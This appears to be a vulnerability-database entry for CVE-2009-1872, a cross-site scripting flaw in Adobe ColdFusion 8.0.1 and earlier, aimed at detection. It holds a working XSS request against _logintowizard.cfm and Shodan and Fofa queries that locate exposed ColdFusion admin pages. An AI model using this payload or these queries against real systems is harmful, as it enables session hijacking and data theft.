🔙 목록으로 돌아가기

CVE-2009-1872: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting

TitleAdobe Coldfusion <=8.0.1 - Cross-Site Scripting
Authorprincechaddha
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor.
CVSS Score4.3
EPSS Score0.08673
CVE IDCVE-2009-1872
CWE IDCWE-79
Shodan Queryhttp.component:"Adobe ColdFusion"http.component:"adobe coldfusion"http.title:"coldfusion administrator login"cpe:"cpe:2.3:a:adobe:coldfusion"
Fofa Querytitle="coldfusion administrator login"app="adobe-coldfusion"
Tags cve2009 cve adobe xss coldfusion tenable vkev vuln

🔍 Vulnerability Description

Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.

🌐 HTTP Request

GET /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2009/CVE-2009-1872.yaml

🦈 Packet Capture: ⬇️ Download cve-2009-1872.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A